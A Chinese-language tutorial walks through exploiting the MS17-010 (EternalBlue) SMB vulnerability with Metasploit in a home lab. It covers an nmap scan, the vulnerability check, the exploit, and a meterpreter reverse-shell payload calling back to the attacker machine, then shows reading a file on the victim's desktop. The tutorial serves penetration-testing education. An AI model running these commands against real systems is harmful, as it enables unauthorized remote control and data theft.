kali初讲——Metasploit攻击ms17

Metasploit攻击——ms17_010漏洞利用

文章目录

Metasploit攻击——ms17_010漏洞利用
导论
一、ms17_010简介
二、攻击使用模块
三、、攻击思路
四、具体实施
总结

导论

学习此教程需遵守《中华人民共和国信息安全法》

所有教程仅用于信息安全测试，且在授权的情况下进行，请勿用于其他用途！

一、ms17_010简介

ms17_010漏洞其实就是永恒之蓝，属于一个较早期的windows的一个bug，攻击端口为445端口。
2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。
英文为：Eternal Blue，翻译过来就是：永恒之蓝。
其实我们现在使用的电脑，几乎没有这个这个bug了。而且，不久之后，微软公司就针对这个bug发布了漏洞补丁。所以，该漏洞在当前很多系统上已经不存在了。

二、攻击使用模块

本次攻击利用的攻击工具为：Metasploit也就是MSF
主要用到Auxiliary（辅助模块），exploit（攻击模块），payload（攻击载荷），使用辅助模块为MSF中的：

auxiliary/scanner/smb/smb_ms17_010

exploit使用的主要是：

exploit/windows/smb/ms17_010_eternalblue

攻击载荷payload使用：

payload/windows/x64/meterpreter_reverse_tcp

内网测试搭建环境：

攻击机ip：192.168.3.125
靶机ip：192.168.3.127
反弹端口：3333

三、、攻击思路

1、nmap扫描靶机是否存在漏洞，得到漏洞名称
2、通过MSF中的辅助模块，验证漏洞是否存在
3、使用exploit相对应的模块进行攻击
4、设置攻击载荷
5、反弹shell
6、查看权限
7、查看靶机上的文件

四、具体实施

nmap扫描靶机漏洞及开放端口

命令为：nmap --script=vuln -Pn 192.168.3.127
192.168.3.127，为你自己靶机的ip

新开终端，并进入root账户。
我们在使用Linux的时候，你可以开多个终端。
打开msf

root权限：sudo -i
打开msf：msfconsole

查询ms17_010辅助模块

命令：search ms17_010

打开所需要的辅助模块（auxiliary）

命令：use auxiliary/scanner/smb/smb_ms17_010

查询该辅助模块需要设置的一些参数

命令：options

我们可以看到，需要设置的参数有：

靶机IP：RHOSTS
攻击端口：RPORT

这里rport（攻击端口）已经设置完成，我们便不在设置

设置所要攻击的主机ip命令：set rhosts 192.168.3.127
设置攻击端口：set rport 445

设置完成，然后扫描目标ip是否存在该漏洞

从图中我们可以看出，目标ip存在漏洞ms17_010，并且，得到了目标的系统版本：windows7 professional。
确定目标上包含此漏洞，那我们下一步肯定是利用该漏洞啦！
没错，就是exploit（攻击模块）
查询攻击模块：

命令：search ms17_010

我们这里使用的是eternalblue（永恒之蓝）

模块：exploit/windows/smb/ms17_010_eternalblue

打开该攻击模块

命令：use exploit/windows/smb/ms17_010_eternalblue

查看该模块需要设置的参数，就是：options/info

命令：options

其实这里也是有两个需要设置的参数，和上面一样的

靶机ip：rhosts
端口：rport
分别是：
set rhosts 192.168.3.127
set rport 445

设置完成，我们还需要设置攻击载荷（payload）
先去查询使用的攻击载荷，这里使用的是反弹shell

模块： windows/x64/meterpreter/reverse_tcp

然后设置payload:

命令：set payload windows/x64/meterpreter/reverse_tcp

然后查看需要设置的参数，命令和上面的一样：options

查询后开始设置，不过这里需要注意的是，我们这里设置的不是靶机的ip和端口，而是攻击机的ip和端口，这里需要注意。我们在使用msf中，需要注意是rhosts还是lhost，或者rports还是lport，这两个是有区别的，前者为被攻击，后者为攻击。

设置反弹ip：set lhost 192.168.3.125
设置反弹端口:set lport 3333

至此，利用ms17_010漏洞的所有都设置完毕，然后我们当然是进行最后一步，运行所有设置，攻击靶机

命令：run/exploit

不出意外的话，一稍等个几分钟，应该会返回如下界面

出现这个界面，说明我们的攻击已经成功了。
然后我们查询系统信息

命令：sysinfo

一般我们攻击肯定是有目的的攻击
我在我的靶机桌面创建了一个名为test的txt文件，我们下面就去，访问他，其中的内容。
使用windows下的shell
我们直接输入：

命令：shell

然后便切换到了windows的命令行也就是我们平时使用的cmd

然后我们列出当前文件夹位置，存在的所有文件

命令：dir

我们都知道，在windows中，桌面其实存在Users下的用户文件夹下面
我这里的用户名为：admin
所以我们使用命令直接切换到admin下

命令：cd Users/admin

在往下切一级文件目录，我们是不是就进入了桌面文件

命令：cd Desktop

查看文件内容

命令：more test.txt

至此，对ms17_010漏洞的复现就讲解完了

总结

其实我们去对目标进行渗透的时候，无非分成下面这几步
1、对目标进行信息收集
2、扫描目标可能存在的的漏洞
3、对漏洞进行测试
4、使用攻击脚本
5、得到想要的结果
当然，实际问题实际分析，要把自己的思维活跃起来！
文中如有错误，请联系笔者修改！
如有侵权，请联系笔者删除！